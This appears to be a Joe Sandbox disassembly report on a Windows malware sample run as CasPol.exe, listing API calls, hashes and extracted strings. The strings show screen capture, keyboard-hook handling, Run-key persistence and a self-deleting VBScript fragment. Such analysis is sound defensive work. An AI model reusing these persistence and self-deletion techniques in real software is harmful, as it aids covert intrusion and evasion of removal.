                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                                                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                          • String ID: JD
                                                                                                                                                                          • API String ID: 1084509184-2669065882
                                                                                                                                                                          • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                                                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                                                                                          • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                                                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID: GetLocaleInfoEx
                                                                                                                                                                          • API String ID: 2299586839-2904428671
                                                                                                                                                                          • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                                                                          • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                                                                                                          • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                                                                          • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1661935332-0
                                                                                                                                                                          • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                                                          • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                                                                                          • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1663032902-0
                                                                                                                                                                          • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                                                          • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                                                                                                          • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                                                          • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2692324296-0
                                                                                                                                                                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                                                          • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                                                                                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                                                                          • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                          • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                                                          • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                                                                                                          • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                                                          • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1084509184-0
                                                                                                                                                                          • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                                                          • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                                                                                          • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                                                          • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EF0,@ev,00474EF0,00000000,00474EF0,00000000,00474EF0,5.2.0 Pro), ref: 0040F920
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                                                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                                                                                            • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                                                                                                                          • GetIconInfo.USER32 ref: 00418FF8
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00419027
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00419034
                                                                                                                                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00660046), ref: 00419077
                                                                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                                                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00419293
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                                                                                                                          • String ID: DISPLAY
                                                                                                                                                                          • API String ID: 4256916514-865373369
                                                                                                                                                                          • Opcode ID: 5ab43138adcd575be0dbcb62ac3445f04d4a9c6ac3cd026803d6245b460d00cf
                                                                                                                                                                          • Instruction ID: 987d9a4534759b20ade43e5cc0d007ec6aae9fd5378911baa39845865ae00971
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab43138adcd575be0dbcb62ac3445f04d4a9c6ac3cd026803d6245b460d00cf
                                                                                                                                                                          • Instruction Fuzzy Hash: D8C15C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,xtv,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                          • String ID: """, 0$")$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$h]v$hev$open$tMG$wend$while fso.FileExists("
                                                                                                                                                                          • API String ID: 1861856835-2938071300
                                                                                                                                                                          • Opcode ID: 01e75365670913a74037fc770f87f6e0f62e7cfdb741a955a470a615d800a725
                                                                                                                                                                          • Instruction ID: 74aa42f7ec26bf67edaf4e1a165d404297a62af2c65c2789fcbb2c22ca84ca6d
                                                                                                                                                                          • Opcode Fuzzy Hash: 01e75365670913a74037fc770f87f6e0f62e7cfdb741a955a470a615d800a725
                                                                                                                                                                          • Instruction Fuzzy Hash: B991B1316082005AC315FB62D8529AFB3A8AF94309F50443FB64AA71E3EF7C9D49C65E
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D1E0
                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D223
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00475300,?,pth_unenc), ref: 0040D232
                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,xtv,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                                                                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,7570D4DF,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                          • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$h]v$hev$open$pth_unenc$tMG$wend$while fso.FileExists("$xpF$xtv
                                                                                                                                                                          • API String ID: 3797177996-2267641185
                                                                                                                                                                          • Opcode ID: 56c26de81a3ad07f9f61490d051f58a648356af45db4a42d1502b8aa40545037
                                                                                                                                                                          • Instruction ID: d04a29aa4e51556796b06844e147f4a7cb6a24a543372ca0e3e4f3e54a9e1c14
                                                                                                                                                                          • Opcode Fuzzy Hash: 56c26de81a3ad07f9f61490d051f58a648356af45db4a42d1502b8aa40545037
                                                                                                                                                                          • Instruction Fuzzy Hash: 7781A1716082405BC715FB62D8529AF73A8AF94308F10443FB58A671E3EF7C9E49C69E
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,h}v,00000003), ref: 004124CF
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                                                                                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                                                                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                                                          • String ID: (TG$.exe$WDH$exepath$h]v$h}v$open$temp_
                                                                                                                                                                          • API String ID: 2649220323-2127812022
                                                                                                                                                                          • Opcode ID: 8441b20f7618228a39f573a204bdd359fc491a9b2039a908e3d83ac6aa0b59e3
                                                                                                                                                                          • Instruction ID: 24c9a3d3f9f851b6826daa3a71410153ee30a0e468f06c14c2e22e8a151f545e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8441b20f7618228a39f573a204bdd359fc491a9b2039a908e3d83ac6aa0b59e3
